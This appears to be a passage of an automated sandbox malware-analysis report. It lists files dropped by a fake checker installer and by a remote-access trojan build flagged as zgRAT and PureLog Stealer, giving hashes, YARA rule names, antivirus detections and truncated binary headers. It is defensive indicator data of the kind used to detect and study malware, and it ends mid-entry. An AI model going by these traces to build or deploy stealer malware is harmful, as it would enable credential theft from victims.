                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="512" height="512" viewBox="0 0 512 512">. <image id="...._1" data-name=".... 1" width="512" height="512" xlink:href="data:img/png;base64,iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAgAElEQVR4nOy9d5Ak2X3f+XnpyrR3483O7O6sN9jFgnAkLAGIICDCiEagIJ1AI90dT7xTxN3FKc7o/tOFFBdxcVRcSHe6EEWdREokQQcIBEk4wi2AxWJ3ucC62dnd8TPty2fmexfvZVZ3Vk3PTPe0n/59JnK6q7pMVmVV/n7vZ74/dfjwYfYgI8DbgMeBh4GHgLuBYC++GYIgCHuEBHgJeBZ4BngK+AYwvxc/AHvFARgD3ptvPwHcD3g7YL8EQRCE7UUDzwNfA74CfBGY2QvH5HZ2AKyR/zjwU8BbAH8H7JMgCIKws0mBJ4HPAb+XOwe3JbebA3An8PPAz+VhfUEQBEFYDzZd8NvA7+Tpg9uG28EBKAOfAH45D++rHbBPgiAIwu2FAb4K/Evgd4HWbn91u9kBOAr8V8DfBcZ3wP4IgiAIewNbI/CvgP8DeGO3vuLd6AA8CvzDPMwf7oD9EQRBEPYmcZ4e+N/zjoJdxW6qhLften+Qv8m/KMZfEARB2GbC3B59N7dPj+ymA7IbHIC78+KLp4GPSo5fEARB2GGo3D59P7dX9+yGA7STHYBR4J8CzwF/Qwy/IAiCsMNRub16Jrdfozt5d/3h4eEdsBs92DfwV4HPAu+X/n1BEARhl2Ht1tuBXwIWdmp9wE6LANyTKzH9X8DkDtgfQRAEQbhVJnN79tWdmBbYKQ6A1eD/H/I8/4/vgP0RBEEQ

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\cmdlinkarrow

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2862
                                                                                                                      Entropy (8bit):3.160430651939096
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:QFFZ+f+zd+kHeNTM9/+Xz++++++++YWWS0i6I:QFFEw4Xc+D++++++++ypi9
                                                                                                                      MD5:983358CE03817F1CA404BEFBE1E4D96A
                                                                                                                      SHA1:75CE6CE80606BBB052DD35351ED95435892BAF8D
                                                                                                                      SHA-256:7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
                                                                                                                      SHA-512:BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
                                                                                                                      Malicious:false
                                                                                                                      Preview:..............(...6...........h...^......... .h.......(....... .........................................................................................................................................................wv....."""""o.."""""o..www""......"/.....""......"/......r.........................?...........................................?......(....... ..................................................."..... .". .6.-.9.;.<.;.D.3.,...4...9...O.,.Q.$.M.2.S.:.\.1.U.$._.1.F.G.I.A.`.@.w.q...|...q...{.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\completi

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.57715132031736
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:+728OQ6YxsPq7v8N+2RdHKb80000000000000000000000000MqfqF2Nnnu8jgLe:+72LQWPq7vEFXVCVKuM4expgz
                                                                                                                      MD5:C23AF89757665BC0386FD798A61B2112
                                                                                                                      SHA1:FD4958B62F83EDF6774FCF7C691CC3270B82AA0B
                                                                                                                      SHA-256:031ED0378F819926D7B5B2C6C9367A0FB1CBAE40E1A3959E2652FE30A47D52F2
                                                                                                                      SHA-512:5727ABA9CD972C8F25B31F2A8E698CA2CAE640427A62A0EA4092FD426B907D39BAF58B8724B6E37965E76BE90EAA329F7D4A7EE4688922ED796D54E4377FC8CC
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................................................................................................................................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d..............................................................................................................................................N.k................................................j....Z..............................................................................................................................o.d..........................................................d...s......

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\custicon

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.2912578217465134
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:+728OQ6UfPsw8PX4E0000000000000000000000000rggggj88jgLiqYTqfI0008:+72LQpPswSXtA4vJbvi
                                                                                                                      MD5:BE6D2F48AA6634FB2101C273C798D4D9
                                                                                                                      SHA1:21D1B2E7BCA49FE727E1C3A505E28E609EC53CC7
                                                                                                                      SHA-256:0E22BC2BF7184DFDB55223A11439304A453FB3574E3C9034A6497AF405C628EF
                                                                                                                      SHA-512:8BC2C9789640ED0E6F266FDC27647F7CE510EFE06ED1225BB8510F082E6C009E7911AEC38F21DE405FA68A418513DA2DC541EDB53F4FA6887603596EBD29F463
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................................................................................................................................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d..............................................................................................................................................N.k................................................j....Z..............................................................................................................................o.d..........................................................d...s......

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\dialog.jpg

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PC bitmap, Windows 3.x format, 500 x 316 x 8, 1 compression, image size 36830, resolution 3779 x 3779 px/m, 5 important colors, cbSize 36904, bits offset 74
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):36904
                                                                                                                      Entropy (8bit):1.6592122603583341
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:ZFgstvLTJ/lJzh7nVnnWpinnJ7FNng6H6ityl6Tk:3gstjTJddWpi7vndHDLTk
                                                                                                                      MD5:ABF1076064505DEE794FA7AED67252B8
                                                                                                                      SHA1:358D4E501BB3007FEECE82A4039CC1050F23FAB4
                                                                                                                      SHA-256:FB0D133F05DE6AA6A7A3491AE532191A60C438B35D9FF7BFEC9E63131F6F0C73
                                                                                                                      SHA-512:9A4680A8D186C1D7550B5E03CBDD095B0C88B2E0249A3AF75FA0253D2C9A6F0AA1DD570ECF1A273683A14E6C7B5FB11678BE3DA439A3BF23EAB790372E96E321
                                                                                                                      Malicious:false
                                                                                                                      Preview:BM(.......J...(.......<..................................................N..U........................................................................................R...S..P..................................................................................R...V..M................................................................................R...[..H..........................................................................R...^..E........................................................................R...a..B....................................................................R...f..=................................................................R...i..:............................................................R...l..7..........................................................R...o..4......................................................R...r..1....................................................R...u...................................................R.......................g..+......

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\exclamic

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.486912391627119
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+jsnrGWGIxANQAI2DZ4uHnIdUsbTgvCh3gs//oUvz4tbr4/w:+YzxkQAj4eIdqv8T//3+bsw
                                                                                                                      MD5:3FBB7DDBC13EDF109E3ACAA7A4A69A4E
                                                                                                                      SHA1:BF53201D998ED6E6F2E07584EFDA9585113AEB0E
                                                                                                                      SHA-256:F8429073C7A83377AD754824B0B81040D68F8C1350A82FF4DCCF8BC4BF31F177
                                                                                                                      SHA-512:CF818A9E88002D373019C0F3C9AF1BE27F20E074C662973898724124EC40F95CEC89F73D4A2F693C73D63981109EFB135057DEEC9245865C3F6351C128AB93D2
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%......................................................................................................................................................................................................................_....w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w..I..............2.w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w.....J............S....w..4...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...;....w..>......................?.w......Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y.

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\info

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.347251063198798
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:+h7OMtMrJbDG0UDLHMrhmZ1galQpAAAAAAAAAAAS55qjOlr9n:+6g0uyi1ZQpAAAAAAAAAAASXqjOp9n
                                                                                                                      MD5:8595D2A2D58310B448729E28649443D6
                                                                                                                      SHA1:08C1DF6FBF692F21157B2276EB1988AC732FF93C
                                                                                                                      SHA-256:27F13C4829994B214BB1A26EEF474DA67C521FD429536CB8421BA2F7C3E02B5F
                                                                                                                      SHA-512:AE409B8F210067AC194875E8EBF6A04797DF64FA92874646957B2213FB4A4F7DA2427EF1ED8D35CD2832B2A065E050298BAC0FC99C2A81DE4A569A417C2A1037
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%.....................................................................................................................{...............................................................................................................................................................................................rqr............................................................................................................................................................................................rqr............................................................................................................................................................................................tst............................................................................................................................................................................}................yxy...................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\insticon

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.9105220993102248
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+7d0iiiiiiiuiiiiiiiZiiiiii0DMiiiiiiZiiiiiPiiiiiDfiiiiiMiiiii1Ji3:+TB4Gds1E2fVE5MF+mJwnwewO
                                                                                                                      MD5:EAC3781BA9FB0502D6F16253EB67B2B4
                                                                                                                      SHA1:5EFF4FCDC405732702432008AB43164CA6F37101
                                                                                                                      SHA-256:F864E8640C98B65C6C1B9B66A850661E8397ED6E66B06F4424396275488AF1BE
                                                                                                                      SHA-512:D108687995B5B02778FC7ACF3A66706E761103B1EE47305D852BF9A190BDF1722B4C6277A13B65BDAD9F4E3F92406F5C7B1B06444D1493F2D4B1AAEAF4176E06
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d...........................................................................................i...N...N...N...N...N...N...N...N...N..S...`.....s.k................................................j....Z.................................................................................N.......................................N.......d..........................................................d...s.............................................................................N......................................If...c..................................................................d....X..

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):22848
                                                                                                                      Entropy (8bit):6.869882977441407
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:jOw0cYAp0r9rjRLIECrsLIECrCXa/rl9qX2Ip4ZByeqjdAA1m5wMhHIu+EH:jOAPORCrICrcKrLy2Ip4Dqxf1mlhHj+G
                                                                                                                      MD5:85111988C5B1948A54E8865DE262A184
                                                                                                                      SHA1:B58670CF0BE0CC488922F82A8D6AC256797191F7
                                                                                                                      SHA-256:D07FB8D8FA591E276C9DFD64ADE398C559A5BFDCF396FA732C46FF6732F26BEB
                                                                                                                      SHA-512:FDFFB6ABF43681E0A107C9A90C9F67A010D462E257BDCA3ABD4A293F3AF87EABDAF17D8B2A7B737A18CEE654151745784AD9673734410CEA52F163D32C228E6A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u9.b.j.b.j.b.j...k.b.j.b.j.b.j...k.b.j...k.b.j...j.b.j.b.j.b.j...k.b.jRich.b.j........PE..L....!od.........."!...#............@........ ...............................`............@.........................P".......$.......@..h...............@=...P..\....!..p............................................ ..X............................text...)........................... ..`.rdata..X.... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc..\....P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\removico

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.8375433162027344
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+SqmR4fTBOTPsbZX78rXSEUFJVkKuCWGDiPlBaBR6J/g/ic9teKUwj11FQ:+SqmiTXZLPjkKuCNU7wic6PR
                                                                                                                      MD5:1FFFE5C3CC990D0C012A428A59B2AE46
                                                                                                                      SHA1:FAE8042826087D9BB4CD4194E7453D56A773EA64
                                                                                                                      SHA-256:45791627AE8E67E6B616117CF21F04DA381722FAF08D07C0C25E0F28C9B8F82B
                                                                                                                      SHA-512:694D63747AD129CA06EBD743E4090642E557F2260C62AA625321BC309C1E2E58D9BFFF1E0AEE37EFFE5FD4628938AD89B659C9ABB43FDC2CF2285212C1A209F2
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%.............................................................................................................................................................................................................................................................................................@..z......u..m..d..c..m..z..........`...%..............................................................................................................................l....g..c..c..c..c..c..c..c..c..c..c..c..c..c..c..x.......-.......................................................................................................=...g..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.......F.............................................................................................c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\repairic

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.5353892544389707
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+7mrhLDFPIc+Q0VDnSOVKaZ8y4mV4pZeJh:+OhHFPvJurSV24mVb
                                                                                                                      MD5:915E40A576FA41DC5F8486103341673E
                                                                                                                      SHA1:528CF57F3775638E721C20A6988DBD322FB39273
                                                                                                                      SHA-256:BF21B2BC3E7253968405F3D244CDB1C136672A5BDB088B524A333264898A2D11
                                                                                                                      SHA-512:66385B58942BAF62B6B33AB646EA981D4A6682F8570B7DF4EFA1A7F4536CB35FE065803314877E95338B8DFB9A854E06A110BD0C2A2D3CE3A7C587E35006649E
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................................................................................................................................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d..............................................................................................6bbb.III.III.iii................................N.k................................................j....Z...............................................................................+RRR.III.III.III.III.TTT....(..................o.d..........................................................d...s......

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\tabback

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24, cbSize 854, bits offset 54
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):854
                                                                                                                      Entropy (8bit):3.802531598764924
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:kUGGGGGGGGjg/QUVdLbCKKKKKKWqqqqqqr:kGUVdnCKKKKKKWqqqqqqr
                                                                                                                      MD5:4C3DDA35E23D44E273D82F7F4C38470A
                                                                                                                      SHA1:B62BC59F3EED29D3509C7908DA72041BD9495178
                                                                                                                      SHA-256:E728F79439E07DF1AFBCF03E8788FA0B8B08CF459DB31FC8568BC511BF799537
                                                                                                                      SHA-512:AB27A59ECCDCAAB420B6E498F43FDFE857645E5DA8E88D3CFD0E12FE96B3BB8A5285515688C7EEC838BBE6C2A40EA7742A9763CF5438D740756905515D9B0CC5
                                                                                                                      Malicious:false
                                                                                                                      Preview:BMV.......6...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\BVT97l6QRY

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\gorkmTnChA.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3860292
                                                                                                                      Entropy (8bit):7.762215927120894
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:IBJI2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sYY:yCnblgmx0+tp+wPJuYZtggwD9C
                                                                                                                      MD5:A7645CAC446E39F9961F51E3BB1C0515
                                                                                                                      SHA1:3D28A81F81325AFD6DC5DAD9E9FC75E081F10C9D
                                                                                                                      SHA-256:E72AC50AEA46FD0CA87B7EE7AF5203BD65D646B8E4A48B46DC1AEDD849B79897
                                                                                                                      SHA-512:3C7DD1069DB524C1E2D3C20ACD3F2CB963E5E3649421124F44E098C1BFCC8BF005C4AC55F3F3B8F0D3B0FF4DBE5E1DED9D61392F624F1378FB02A852217360D9
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\FjB3G0aOKl

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\Gl4BJgwgtg

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):98304
                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\I7S47rJ7f7

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\KUA0FEd33u

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI43FC.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI447A.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
